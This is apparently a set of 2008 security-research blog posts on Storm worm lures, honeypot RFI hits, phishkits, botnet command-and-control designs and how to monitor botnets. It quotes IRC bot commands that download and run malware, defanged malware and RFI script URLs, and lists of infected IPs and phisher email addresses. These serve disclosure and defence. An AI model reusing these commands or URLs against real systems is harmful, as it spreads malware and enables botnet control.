CME711 - April Fools

I'm a bit late posting this one - I've been working on some penetration testing projects and have been unable to monitor my honeypots.

For those who have not yet noticed:

(image captured by DISOG staff on 2008/03/31)

5 second refresh downloads funny.exe, image click downloads kickme.exe and click here link is foolsday.exe - all of which are the same file.


The email:

From: sauna@piraeusbank.co.yu
To: Me
Subject: Gotcha! April Fool!
Date: Mon, 31 Mar 2008
MIME-Version: 1.0
Content-Type: text/plain;
format=flowed;
charset="iso-8859-1";
reply-type=original
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4807.1700
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700

Doh! April's Fool. hxxp://69[dot]237[dot]180[dot]107

(obscuring done to protect the click-happy)

Drops a file in C:\WINDOWS\ called aromis.exe

Jose Nazario caught this one early on - check out his blog here.


I ran a quick query on my honeypot and found the following IP's serving the malicious site:

12.227.199.128, 157.252.144.83, 12.180.197.108, 201.236.232.174, 122.27.202.155, 201.223.28.183, 201.221.253.101, 201.244.162.4, 195.210.193.131, 190.51.252.2, 190.20.204.27, 201.255.219.218, 201.250.17.202, 190.164.121.145, 12.52.237.174, 201.83.126.59, 200.94.236.26, 201.233.92.206, 190.18.184.125, 194.106.95.22, 190.74.93.29, 190.99.245.190, 201.21.230.245, 12.206.243.139, 125.25.186.158, 125.25.184.146, 124.179.81.214, 190.184.11.24, 24.9.162.81, 24.207.187.180, 24.17.32.118, 209.33.54.179, 24.128.211.65, 24.128.104.153, 24.205.232.114, 24.34.213.108, 24.107.238.132, 221.156.165.195, 203.170.120.109, 59.0.132.4, 58.148.79.162, 211.247.36.237, 221.127.42.208, 59.162.171.116, 60.50.177.152, 218.53.196.196, 220.174.64.208, 68.35.77.47, 67.67.70.158, 67.186.80.253, 65.42.229.61, 67.149.51.30, 64.118.1.21, 68.114.21.117, 66.177.6.37, 63.78.245.134, 68.184.58.72, 68.40.43.30, 67.169.119.102, 67.189.224.51, 68.39.43.90, 65.191.88.121, 64.30.104.120, 65.60.228.114, 65.32.52.189, 67.185.230.180, 65.79.220.132, 68.202.92.236, 68.202.117.9, 67.42.158.183, 64.175.44.163, 67.158.13.101, 60.53.249.16, 68.127.123.188, 69.154.218.209, 71.226.39.64, 69.144.160.49, 68.63.19.201, 71.239.243.175, 70.136.17.38, 69.231.229.151, 68.83.16.79, 69.140.233.125, 69.225.253.167, 69.211.140.58, 69.246.94.16, 70.92.29.202, 74.129.21.5, 70.238.127.143, 69.207.251.224, 72.8.101.213, 71.9.7.113, 70.227.199.237, 69.183.188.168, 70.237.145.26, 71.197.38.110, 68.50.219.36, 71.142.241.127, 69.42.3.50, 74.233.128.126, 70.127.87.220, 70.126.163.86, 70.15.184.87, 71.84.167.230, 70.127.141.133, 71.75.20.9, 69.228.202.232, 74.75.186.228, 71.115.3.254, 72.186.88.186, 70.55.64.54, 69.238.88.2, 75.32.162.49, 75.18.100.96, 75.35.30.89, 76.30.141.221, 98.202.86.206, 75.143.144.223, 76.125.185.59, 76.194.244.132, 98.200.190.127, 75.4.244.196, 76.115.75.239, 76.123.171.54, 76.124.142.87, 98.195.201.101, 76.114.139.114, 98.192.11.39, 76.26.11.182, 99.129.205.142, 76.227.155.39, 76.99.94.153, 98.212.18.73, 99.162.53.130, 99.171.119.45, 76.99.195.186, 76.84.211.214, 98.220.158.148, 76.178.7.202, 76.229.114.181, 76.29.166.146, 99.130.33.79, 99.147.177.92, 76.111.136.44, 82.232.24.247, 75.4.50.13, 87.96.165.131, 89.132.71.47, 81.56.175.146, 85.155.32.253, 88.235.196.103, 80.31.76.46, 86.12.37.214, 81.97.222.20

Excellent ISC diary entry

I really enjoyed reading a recent ISC diary entry by Maarten Van Horenbeeck.

Its very important for malware researchers and forensics folks to expand their focus when dealing with intrusion incidents, regardless of if the attacker is white hat or black hat. The attacker knows you are watching, and they will try to hide in plain sight. This entry involves trickery on multiple fronts. If you don't have an expert group of penetration testers attack your network quarterly, an expert group of blackhat hackers might.

Stories like Maartens help keep me interested in going to work every day.

I'd love to hear more stories like this one - if you'd like, please share them in the comments section.

CME711 - Its a howl!

Storm/CME711 is back to a 'funny greeting card' page.


(Note the "copyright error" in the image)

• The file postcard.exe is offered by clicking on the image.
• The file ecard.exe is offered when waiting 5 seconds.
• The file e-card.exe is offered when clicking the 'click here' link.

Many people already watch for *card.exe with their IDS. I don't expect this to last long. Perhaps the next will be related to the anticipated U.S. Economic Stimulus Package --- or maybe Easter?

It appears this latest run drops the peers list to c:\windows\system32\diperto.ini.

A few MD5's for the binaries are:

11b9d46c4b3e2059361a9ca3d85ddf82
399c189575547593a5b1f0dcab23cf67
4291a354788c2e4100ff7286c03536e2
47336a1cc00f028abbd75fc44ac51b75
51730a17b5dbfb4d508ac9c6c9b3a574
73b17235901ecbb04ec5e1984df89b4d
76e8e63915ec5c44f62e1bbd91b47522
dea1a23e7561e0326edc0e1b487b07dd
e65359a96fb163553f4e5516ac150d1f
e68e331c3e4fd2c1e6a5eaa233cd8554

RFI's and Phishing Tricks

Our Honeypots have been hit with a rash of RFI's lately - we count over 1600 attempts from Feb 20-Feb 29. Some of the higher numbered attempts are listed below.

(71) http://www[dot]gumgangfarm[dot]com/shop/data/id[dot]txt
(53) http://www[dot]geocities[dot]com/giwel/file/id[dot]txt
(48) http://www[dot]tuttoscemo[dot]com/administrator/components/com_juser/id[dot]txt
(44) http://www[dot]tirateuncentro[dot]com/components/com_extcalendar/safe1[dot]txt
(44) http://mensagenss[dot]hospedagemdesite[dot]com/bot/safe[dot]txt
(42) http://www[dot]upload2world[dot]com/pic76/upload2world_e439c[dot]gif
(42) http://www[dot]upload2world[dot]com/pic76/upload2world_85356[dot]gif
(40) http://www[dot]upload2world[dot]com/pic76/upload2world_4d669[dot]gif
(38) http://proxysx[dot]t35[dot]com/cmd2[dot]txt
(37) http://www[dot]tukangbecak[dot]com/ban[dot]gif
(36) http://www[dot]upload2world[dot]com/pic76/upload2world_4d669[dot]gif
(36) http://anjink[dot]co[dot]cc/gen/mix[dot]txt
(33) http://heidik[dot]org/canar/cmdaff
(32) http://horseshoebendarkansas[dot]net/blog/nucleus/libs/include/safe[dot]txt
(32) http://heidik[dot]org/canar/safe[dot]txt
(29) http://www[dot]watbowon[dot]org/Joomla1011th/cache/id[dot]txt
(29) http://jobarte[dot]t35[dot]com/cmdtotal[dot]txt
(26) http://www[dot]iblon[dot]it/images/stories/test1[dot]txt
(23) http://www[dot]scrappysonline[dot]com/store/skin1/can
(21) http://www[dot]pricetrim[dot]com/counter/auction[dot]txt
(21) http://stmikx[dot]freehoxt[dot]com/Sekip/id[dot]txt
(20) http://www[dot]rangersales[dot]com/images/can

These are likely automatic crawlers - botnet stuff. We've seen attacks on honeypots that haven't been indexed in almost 6 months.

Thankfully most of these sites quickly removed the exploit code. There are still some that are live as of this post. A few of these RFI's are located on sites that have been compromised by attackers only hours earlier.

Following some code like this, we spoke with a system administrator who asked to remain anonymous. He kindly offered system logs from a site that we identified as compromised. The site was serving a paypal phish (and has been taken offline).

In the logs were several attempts to download packages from enache.3x.ro. Some investigation revealed that this site held a number of phishing and exploit packages for both windows and unix. The site has been removed by the hosting provider, 3x.ro. Some of the binaries tripped the following AV signatures:

Backdoor.Linux.Phobi.A, Backdoor.Linux.Zorg.B, DOS.Linux.Blitz, Generic.Slapper.E69A1FF5, Generic.XPL.Samba.E2FFD420, Linux.RST.B, Trojan.Dos.Linux.Slice.B, Trojan.Exploit.Linux.Brk.C, Trojan.Exploit.Linux.Brk.D, Trojan.Exploit.Linux.Brk.E, Trojan.Exploit.Linux.Race.B Trojan.Exploit.Linux.Race.C, Trojan.Flooder.Linux.Silly.B, Trojan.Flooder.Linux.Smurf.B, Trojan.Hacktool.Flood.A, Trojan.Hacktool.Linux.Bf.B Trojan.Hacktool.Linux.Pscan.A, Trojan.Hacktool.Linux.Small.B, Trojan.Horse.(AV|BU|BY|CA|CB|CC|CE|CF|CI), Trojan.Linux.Hacktop.B Trojan.Linux.Mircforce.B, Trojan.Linux.Rootkit.C, Trojan.Linux.Rootkit.N, Trojan.Linux.Rootkit.SA, Trojan.Rootkit.Linux.Agent.SH Trojan.Rootkit.Linux.Agent.Y, Virtool.Linux.Shark.A, Virtool.Linux.Sshscan.A, Win32.Parite.B, Win32.Worm.Linux.Adore.A, Worm.Linux.Lion.A

In total there were over 80 packages on the site. Of those, 14 of them were phishkits:

Arsenal Credit Union (Account Information emailed to mefy12345@gmail.com)
E-Trade (Account information emailed to giianny@yahoo.com)
Paypal (Account information emailed to proces.verbal@yahoo.com or micumicu1@gmail.com)
Banca Intesa (Account information emailed to muielagaborisilavoi@gmail.com)
Mid America Bank (Account information emailed to varu2005@gmail.com or telefon.mobil@yahoo.com)
Poste Italiane (Account information emailed to catalinum@yahoo.com)
First Interstate Bank (Account information emailed to sbrns51@gmail.com)
Gesa Credit Union (Account information emailed to mefy12345@gmail.com)
USF Federal Credit Union (Account information emailed to mist3ry@evoreal.net and k0rd1t@yahoo.com)
Wachovia (Account information emailed to telefon.mobil@yahoo.com or m3fystutzu@yahoo.com)
Capital One (Account information emailed to hai.cu.spamu@gmail.com)
ICBA (Account information emailed to mefy12345@gmail.com)
Oregon Community Credit Union (no email address assigned)
UCCU (Account information emailed to proces.verbal@yahoo.com)

While none of these kits used it, we've noticed that the ED/Pharmacy site spams hitting our mailboxes are using favicon.ico files of a padlock icon and sporting hacker safe logos. - A trick said to be coined by L. Jean Camp



This image plays on the statements IT people have made for years: Watch for the padlock icon to identify secure sites.
I think we need to modify our statement: Click the padlock icon, and verify who you're doing business with.
Who knows how many users this has fooled - and how many phishing sites have/will follow suite.

Welcome to my homepage - CME711's latest run.

While checking my Stormworm/CME711/Peed/Peacomm/Zhelatin honeypot I noticed a recent page in German - which was roughly translated to English using an online translation utility:

Patrick homepage
Hello everyone!
Welcome to my home page

Short about me:

I have thought a lot, and now decided that normal relations with the woman I am with is not acceptable.
I am gay. My new life has changed a lot. I found a friend. The new sensation was the top and I do not
remember when I last felt so well. With my friend I spent the whole day, but then our love came to an end.

Now, I have only the soul of pain and memories. And now I will again find someone that I like,
with whom I spend my time and have sex too. The photo is a half year old (link:/album/IMG9481.exe)

I am unable to retrieve the binary - it appears the CME711 author(s) are still tweaking the page. The boarder of the page is an image, p.jpg. As soon as they finish updating I will post more details and a screen shot.

I suppose this could be loosely linked to the ED spam everyone is seeing in their email.

Botnet Distributed Command and Control. (DC&C)

Over the past four years we've seen a large number of law enforcement, ISPs, and hobbyists get involved with botnet monitoring. A side effect of the increased interest is that botnet operators will go to great lengths to keep their botnets hidden. That includes encryption, hiding in plain sight, use of undocumented/new protocols and distributed control structures. As law enforcement arrests more offenders, we see more of them using TOR, or their own botnets to hide their true identity. While I personally don't feel it will ever be the super-bug theory that Paul Vixie and Gadi Evron imagine, it is a concern we need to be aware of.

The following post may help drive some botnet operators deeper underground, but the concepts are not new. In many cases these concepts are in use today. I presented on these topics a year ago at the 5th Botnet Task Force conference. For a year security researchers and law enforcement have had the chance to reflect on my presentation and develop mitigation.

Distributed Command and Control is simply a term we use to identify botnets where the operator has learned that directly controlling a large botnet is a big risk to himself and his network. Large scale botnets still exist today, however the operators are wisely breaking these networks up into many smaller networks - or using peer to peer communication. Since the networks are spread out, its harder to eliminate the threat of one attacker.

For example, if a botnet operator takes his 50,000 bots, and spreads them out into 10 networks, each net could have 5,000 drones. By spreading his network out, he mitigates some of the threat from rival operators, botnet hunters, ISPs, and law enforcement. Even if one controller node was taken offline, the botnet operator has 45,000 bots to retaliate with. In many circumstances this gives an operator the heads up he needs to update his 45,000 other bots and protect his empire.

As recent as two years ago, we've started seeing botnets using a pyramid structure, like the simplified image below.



A botnet operator is represented at the top of this flow chart. He communicates with a smaller botnet of only a couple dozen drones. Those drones then communicate with many larger botnets, who perform the stated action. This provides the botnet operator a layer of protection. Now the experienced researchers or law enforcement must find the smaller net, to identify the botnet operator. This is time consuming work, and with out the cooperation of ISP's, its hard work. Even if a controller node is found, it is much easier to snoop on a net with 5,000-10,000 drones than it is one with less than 100 drones.

This distributed structure also helps if the botnet operator wants to rent out or sale portions of his bot. One chunk can be used for spam, while another may perform better in Denial of service type activities.

Another example of distributed structure is the P2P scenario, where the botnet operator issues a command, which is passed to a number of supernodes, whom then pass it to the single peers.

Mapping peer to peer and other types of DC&C's are still possible. It was done with Stormworm and will continue to be done with future P2P botnets. I wont highlight how researchers are doing this mapping, simply because we need to weigh teaching public (including bad-guys) and keeping an ace up our sleeves. I'm hoping this post will spark many closed door conversations to help investigate other methods for tracking and identifying.

As part of the BTF presentation I gave, I wanted to outline additional C&C vectors that could be used. The idea that really caught my eye was based on hiding in plain site. Using protocols that are commonly used by millions of users every day. CME711 (Stormworm) has been easy to keep on top of, because of the mistakes they make in maintaining their DNS (fast flux), registering their domains and using UDP P2P traffic. Because of that UDP P2P traffic many large corporations have been immune - they disable UDP outbound.

The number of infected machines would increase dramatically if the used a connection model similar to Skype.

So back to hiding in plain sight - What would you say to a bot that received its commands over RSS? News readers use RSS to gather headlines and a few lines of news. Users are able to quickly choose articles that interest them, while ignoring those that do not. Millions of people subscribe to RSS feeds, and many of those feeds are of blogger or comment pages. Many news sites allow comments on their website, which can then be retrieved via RSS. Since RSS is simply http requests wrapped in a pretty new interface (XML) bots could easily parse this data to receive commands. An anonymous poster could post a command, and bots could be scheduled to pull the feed every 10-15 minutes. The request would look like legitimate RSS traffic and it would be hard to tell which visitors were bots and which were legitimate.

Using a form of encryption the botnet operator could even protect his botnet so others were unable to issue commands. High profile news and blogging sites might not be so helpful with requests to disable portions of their website because a botnet used it as a command and control vector. They might be more willing to assist law enforcement though, certainly more willing than some ISP's.

So how do users protect themselves, and the rest of the internet community?

First, users should use common sense. Don't click links in email or instant messenger! If the email contains a link, use the cut and paste function to visit URLs. If you're offered a picture or video in instant messenger, verify the sender sent the file and only then use your best judgment before proceeding.

Don't download untrusted software. Even if its recommended by your neighborhood computer genius (highschool student) - do research with an internet search engine. What do others say about it?

Don't surf as an administrator. Even if you do pick up a piece of malware, if you're logged in with limited privileges you will be less likely to install harmful malware.

Online banking should be done from a secure location. Do not access your bank account from hotspots like coffee shops or restaurants. Avoid doing so from work as well - remember in the United States you have no right to privacy on your corporate PC, which likely means your boss is watching where you surf. He or she might just be using a keystroke logger.

Never give your personal information on the internet. Your bank will not notify you of account problems via email - and in the event that changes over the next few years, bank pages are usually encrypted. Watch for "https://" at the beginning of your URL bar. Watch for the padlock icon on most browsers. If you're presented with an expired or self signed certificate, cancel the connection and notify the webmaster immediately.

Consider using a Sandboxer for programs that access the internet. SandboxIE is a great piece of software that will wrap around web browsers, email clients, instant messengers, just about any application that accesses the internet. It uses temporary user space to protect you from hostile code.

Don't consider "known" sites trusted. No site is ever trusted. Sites are compromised every day. Many times these compromises point to code that will attempt to compromise your PC.

If possible, disable Javascript for sites you casually visit. Using the NoScript Firefox plugin is an excellent idea for most users. This is becoming increasingly harder as poor coders are hired to develop websites.

Use firewalls at both the router and operating system level.

Turn your pc off when not in use. Even if your machine is infected, the damage it can do would be limited to the time you spend on your system. Most users are on their home computer for only a few hours a day.

Keep your Antivirus definitions and application patches up to date. Remember many third party applications will not update every month like your operating system. You should do this manually or work with the vendor to schedule updates.

Alternative operating systems are no excuse for poor security practices. Linux has malware, OSx has malware, BSD has malware. Keep your security hat on even if you don't run the targeted OS of the month.

Report suspected botnet activity and spam. CastleCops and Shadowserver have excellent resources available to help report malicious activity. DISOG staff always welcomes submissions via email (staff [-at-] disog.org).

Researching your own botnets

This post is mainly for people interested in researching botnets. Many people treat botnet monitoring as a hobby. In many ways, its almost as fun as people watching.

Section 1, the rules of behavior:

You will likely see information you should not normally be privy to. For example, keylogged data, passwords, IP's of vulnerable systems, instant messenger conversations, etc. You must not repeat any private information you see. You must not use any private information you see. You may report leaks of private information to the victim (if known) or law enforcement. Do not report such information to botnet monitoring groups, mailing lists or blogs. Remember, you too could be the victim some day. Treat the data you see with respect.

You may at some point get admin rights on the botnet - Occasional hiccups happen. You must not issue any commands to disrupt the botnet or remove the drones. Issuing commands places you in the same category as the attacker, and in many countries you can be charged criminally if caught. There have been extreme cases where botnet authors replace the remove function with hostile code that causes more damage to the victim PC.

You may contact ISP's, domain registrars, and victims in attempts to get the botnet taken offline. You will likely receive the hairy eyeball - be prepared to back up your accusations/statements with hard facts.

In some countries monitoring botnets is illegal, in others there has not yet been a ruling. Check your local laws before monitoring! Understand you accept all risks. If your not comfortable with this, don't read any further.

You will likely get attacked or threatened. As you learn how the botnets work, you will likely tip your hand. Everyone does. Since botnet hunting has become such an interesting hobby, there are hundreds of other people making these mistakes too. For that reason, the botnet operators (aka herders) have a keen eye and can identify snoopers quickly. In most cases you will simply be denied access to the botnet, by IP banning. In others you will be threatened by the botnet operator, or hit with denial of service attacks. This generally upsets your internet service provider, and you could risk losing internet access.

Never, ever, use proxys to snoop on botnets. If your too chicken to do it from IP addresses you have legitimately rented, then don't track botnets. Using proxy's means you're placing someone else at risk for denial of service attacks, and repeated attacks could mean they lose internet access. While there is a certain risk proxy operators take, your sloppy botnet monitoring skills should not be one of them. Dialup accounts are cheap, between 5 and 10 dollars a month in the US. Use one if you're worried about staying anonymous. Additionally you don't know who may be intercepting proxy traffic. A proxy operator may not be as honest as you, and may use captured botnet traffic maliciously.

Section 2, Locating binaries:

For this section I turned to my old Standby, SearchIRC. Using the keywords ".download http:// .exe" I was able to find:

.download http://www[dot]kartalkusculari[dot]com/oky.exe C:/oky.exe 1
Connects to:
Server: irc.webmaster.com
Port: 6667
Channel: #pert
Channel Topic: .advscan asn2 200 5 0 -r -b
Also downloads http://www[dot]freewebtown[dot]com/hidex/test.exe

.http.exe http://www[dot]freewebtown[dot]com/ssexs/mode.exe C:mode.exe 1
Connects to:
Server: irc.webchat.org
Port: 6667
Channel: #Scanall`

.scarikiamo http://www[dot]freewebtown[dot]com/n0mad/abdo.exe c:/abdo.exe 1
Connects to:
Server: f0ryou.no-ip.info
Port: 6667
Channel: ##!scanall, ##!scanallexp

Other malicious files can be found by looking through the archives at MalwareDomainList and OffensiveComputing.

Section 3, extracting information:

Malware disassembly is an art, and something that can't be explained in a paragraph or two. However there are a few online sandboxes that will assist you as you get started botnet hunting. Anubis and CWSandbox are great. If you have time and resources to spare, investigate creating your own Truman sandnet. Once you've decided to manually reverse engineer malware, I suggest looking around OpenRCE, and attending an Assembler class at a local college.

Other useful tools for new hunters include: Process Explorer, Malcode Analysis Pack, IdaPro, OllyDbg, Cygwin, Perl and Python.

Section 4, putting it all together:

Once you've downloaded a binary, upload it to one of the free sandbox tools listed above. These tools will give pretty detailed information. If your binaries Command and Control (C&C) method is IRC, fire up Infiltrator. Using the sandbox details you should be able to set your username, nickname, and software version to mimic the bot. Connect to the botnet and log the traffic (if permitted by local Laws).

Keep a journal of what you see, learn how the bot interacts with the operator. Learn the commands commonly used, and watch for additional malware as the bots are updated or moved. Note any click-fraud or denial of service attacks.

Section 5, moving on:

Computer security doesn't start or stop with botnets and malware. There are so many more things to explore and learn. Attend conferences, join local user groups and mailing lists, obtain SANS certifications. You never know what the next big thing will be. Stay cutting edge and you will enjoy everything computer security has to offer.

Infiltrator Botnet Monitor

Usually the first question asked by someone who is interested in botnet monitoring is, "What do you use to monitor botnets?"

New hunters tend to watch IRC networks, then move up to HTTP, P2P, etc. Many new hunters try to use off the shelf IRC clients, until they realize the bloat really isn't worth it, and monitoring more than a dozen nets is incredibly impossible. Furthermore, monitoring custom IRCd's with an RFC compliant client will likely raise the suspicions of the botherder.

A friend (Magictao) found a newer client called Infiltrator and passed it my direction. Infiltrator is a python script written by zeroq. It should run on both Windows and *nix, and will allow you to monitor several botnets at once with very little bloat. We use something similar here at DISOG.

Paul has not had a chance to review the code yet and my python is very weak but I could not see anything too dangerous. Just remember this client will download urls seen in the IRC traffic. Please do what you can to protect yourself from accidental discharge of any downloaded malware. I ran the client for an hour or so this evening, and it did everything as advertised. Its missing documentation, but if you have a few minutes - give it a shot!

Pharmacy related sites - the work of CME711?

Over the last few months there has been a large number of domains registered for what appears to be pharmacy related sites.

Many of the sites are using 5 minute TTL's with multiple A records.

Possibly related, Websense posted this today: http://www.websense.com/securitylabs/blog/blog.php?BlogID=170

Websense believes the spam they have seen is related to Storm/CME711. Its very likely that these domains are also related, but I'm stopping short of claiming that at this time.

~400 examples are:

24storerx.org, aacsrwalty.com, aadwsv.shipany.cn, aaqpsh.flowsame.com, actand.com, aftersilent.com, agoeven.com, agosurface.com, agreecopy.com, agreedoctor.com, aktzu.centurytie.cn, alsochair.com, alsoother.com, alwaysgive.cn, amonggold.com, ancorrect.cn, angerbest.com, ao.drawdecide.com, aokhb.termcrop.com, atg.imagineoh.com, barhair.com, barresult.cn, basicsat.com, baspul.com, bbm.drawdecide.com, beautywest.cn, bestgoodguide.com, bestgrayso.com, besthotelsoxford.com, bestpillstick.com, bestrateon.com, bestwhiteso.com, bestwhitso.com, betweengrass.cn, bhi.wishlisten.com, bigbonger.com, boatnor.cn, bothstill.cn, brightmany.com, bringheart.com, bringpay.cn, brotherwhose.com, buteat.com, buychange.cn, bvogiwr.movesince.com, canwehost.com, cardfresh.cn, carrystood.com, cattable.com, causechild.com, causeshare.cn, centurytie.cn, cheaptmundo.com, chekdirecto.com, chekguia.com, chektierra.com, chickcourse.cn, chiefthird.cn, childturn.cn, chinaonworld.com, colonystone.cn, containadd.com, containyour.com, continueboy.com, continuedouble.com, cooktwo.com, cornerbrother.com, cottondecimal.com, countplace.com, courserule.cn, coverhuman.com, coverpiece.com, creasefine.cn, cureabc.org, dangerwhose.com, davort.com, decidedoor.cn, decideshort.cn, decimalmuch.com, desertother.com, desertsure.com, desertthat.com, develophold.cn, developstudy.com, dgani.throwline.cn, dhino.lookstretch.com, didsoil.com, directdrugred.com, divideif.cn, dkqkao.shallask.com, dogloud.cn, doublespeech.cn, downminute.com, drawdecide.com, ducksong.cn, d.wishlisten.com, e4rxmeds.org, eabch.subtracttree.cn, earlyspot.com, earlywarm.com, eastman.sailhim.com, edgeatom.com, edgegive.com, efp.onewhole.cn, eioow.speeddegree.com, elsedear.com, endlet.cn, entercame.com, eromeds.com, esplhaf.whatshore.com, evenspot.cn, exceptboat.com, experimentshore.cn, factclose.com, fairengine.com, farmmonth.com, fdrei.butseem.cn, feartold.cn, feeddark.com, feedhat.com, fewreason.com, filllead.com, finalmine.com, fitglad.com, flategg.com, flatread.com, flatrub.com, flowerfeet.cn, forcechord.com, foundby.cn, foxlawonline.com, friendgun.cn, fromport.cn, fuvlma.suddensilver.cn, fvzyevo.girlroot.cn, fxzhpu.wishlisten.com, gaswent.com, g.greatsoxdirect.com, gladfarm.com, glassneighbor.com, gohour.cn, goldfear.cn, gonwodm.syllablewill.cn, goodmoodman.com, gotdraw.com, goyapas.net, greatsoxdirect.com, groundoil.cn, groupseem.com, growfell.com, guessbegan.com, hadstop.cn, happenrepeat.cn, hardsummer.cn, hasout.com, healthdivision.org, heardweight.cn, heardwinter.cn, heatpractice.cn, heavyclass.com, heavyobserve.com, hopeyoung.com, hoqte.wishlisten.com, hurryrecord.com, iabqs.lightcapital.cn, ideathan.com, iffraction.cn, imagineanimal.cn, imagineoh.com, imscin.troublesea.cn, intereststudy.com, int-pharma.com, iqdod.spokeeye.cn, iteffect.cn, iwihjb.largeprobable.com, joysurprise.com, kcooj.shipany.cn, kebird.com, kemtkbo.vowelthrough.cn, kingrx.org, largeprobable.com, leadposition.cn, learndegree.cn, leastcall.com, lessvoice.cn, levelsmell.cn, liftduck.cn, liftmatter.com, lightcapital.cn, lookstretch.com, lotthink.com, lovelypills.com, lovepharmcheck.com, lowgood.cn, luecq.whothese.com, l.wishlisten.com, matternote.cn, meantplace.com, measureremember.com, medicalplacetrade.com, medisuccess.com, medsalon.org, medsbuzz.org, medscit.com, medselectron.org, medsher.com, medsjumbo.org, medsonline-new.com, medsplacecolor.com, medsqualitynecessary.com, medssuperstore.org, megumw.beginclimb.cn, melodylone.com, memountain.com, middlecircle.cn, miletake.com, minf.imagineoh.com, mixevery.com, mloism.spokeeye.cn, moment4medical.org, monthlength.com, mountainforward.com, mountstate.com, mountwide.com, mouthsell.com, muchwrite.com, musicindicate.com, musiclarge.com, mw.imagineoh.com, my24meds.com, nearred.com, nearvisit.com, neckespecially.cn, neckfavor.com, newpillsfour.com, ninepaint.com, nirmteq.beautywest.cn, nitrousoxideonline.com, nnusint.caughtkept.com, northfit.cn, ns1.kepcar.com, ns1.podezm.com, ns1.zipolt.net, ns2.bilepa.com, ns2.podezm.com, ns2.telyxnet.com, ns2.zipolt.net, ns4.medabcs.org, oilhow.com, one-edmeds.com, onlinedrugsset.com, onlyexcept.com, onron.intereststop.cn, ooghh.teachclimb.com, opensrx.org, orderhold.com, orx.wishlisten.com, ourroyaloem.net, ownfull.cn, ownreach.cn, parenthorse.cn, partcolumn.cn, particularprint.com, pathexperiment.com, pav.greatsoxdirect.com, pharma-vo.com, pharm-edone.com, pharmonlineyou.com, pharmplaceleave.com, pharm-x-press.com, piecestreet.com, pills33.com, planetclaim.com, playduring.cn, prettyevery.com, productagain.com, propersince.com, protectphrase.com, provethird.cn, psbq.measureremember.com, psezanm.saycame.com, pushfamily.com, p.wishlisten.com, qaicnlj.servehit.cn, qee.presentfly.com, qourm.takeresult.cn, quiteyour.com, raiseend.com, raisesnow.com, rangepattern.com, rangorp.net, rathershape.com, reasonso.com, requireisland.com, ridepossible.com, risecheck.com, rj.wishlisten.com, rollspeak.com, roomcaught.cn, roothad.cn, roundstand.cn, royaloemsoft.com, rqopsip.amonghand.cn, ruborse.com, rulespring.com, rx800.org, rxcounts.org, rxhandsup.org, rxonlinethe.com, rxqualitypresent.com, safechief.cn, samanthafoxsite.com, samosahead.com, sandnatural.com, scorebed.com, seamoment.com, seasonchance.com, seatfeel.cn, segmentsign.cn, selfoh.com, sentencewe.com, servehit.cn, setcross.cn, settlechord.com, settlelie.cn, settletone.com, shecommon.cn, shefill.com, shipany.cn, singwill.com, sisterexact.com, sitepharmgarden.com, sizetruck.com, sleepburn.cn, snowseat.com, softbestgrand.com, softsiteprovide.com, softwareonlinemuch.com, solvewest.cn, sonrain.com, sosgay.subtracttree.cn, speakgas.com, speakpound.com, speeddegree.com, spokeeye.cn, springexcept.com, squareway.cn, standwheel.com, starsrx.org, statewas.com, stretchstar.com, strongmust.com, subtracttree.cn, suggestgrand.cn, suggestleave.com, suitconnect.com, suitleast.com, surefinal.com, tablewhose.com, tailevent.cn, thanpopulate.com, thebetterredso.com, thechiso.com, thepawso.com, theredsoxes.com, thereseason.com, theseatsoxfactory.com, thinspace.cn, thoughtmouth.cn, thoughwalk.com, tmhued.creasefine.cn, to.drawdecide.com, toldexact.com, toldwhere.com, tomdef.com, touchwild.cn, towardvary.com, treecase.com, treetriangle.cn, truckclimb.com, uesjpm.servehit.cn, umajct.subtracttree.cn, unmos.shipany.cn, untilport.cn, uplone.com, verbalso.com, villagedepend.cn, vowellow.com, vowelthrough.cn, walkmore.cn, weekinvent.cn, weekown.com, wfa.drawdecide.com, whatcurrent.com, whensafe.com, whoseour.cn, whothese.com, whyallow.com, willcat.cn, windowloud.com, wintersilent.com, wishlisten.com, wquos.latebring.com, wroteplan.com, wyk.wishlisten.com, xpt.wishlisten.com, xznluo.statejoin.cn, youngchord.com, yourcrease.com, yyoat.suddenfull.com, zkgio.sharecontrol.cn, z.wishlisten.com

These domains share many of the same A records, which is what caught my attention.
More information available as soon as I know more.

CME711: Happy Valentines Day and Halifax phish

The CME711 gang has changed their tactics again. We've started seeing emails in our mail drops with pointers to nodes serving "withlove.exe" and "with_love.exe".

So far they have reverted back to sending IP's in the email body, which makes it easy for most spam filters to catch.

The website code looks the same as in previous runs, with false binaries in comments and the greeting:

Your download should begin shortly. If your download does not start
in 10-20 seconds, you can click hereto launch the download
and then press Run

The link is a javascript: document.write( unescape( '%3C%61%20%68%72%65%66%3D%22%77%69%74%68%5F%6C%6F%76%65%2E%65%78%65%22%3E%0D%0A' ) );

That javascript translates to withlove.exe -- Additionally there is an image of a pink heart on the page that links to with_love.exe. You may wish to update your snort signatures.

Additionally we're tracking a phish using stormworm fastflux nodes with the domain ibank-halifax.com.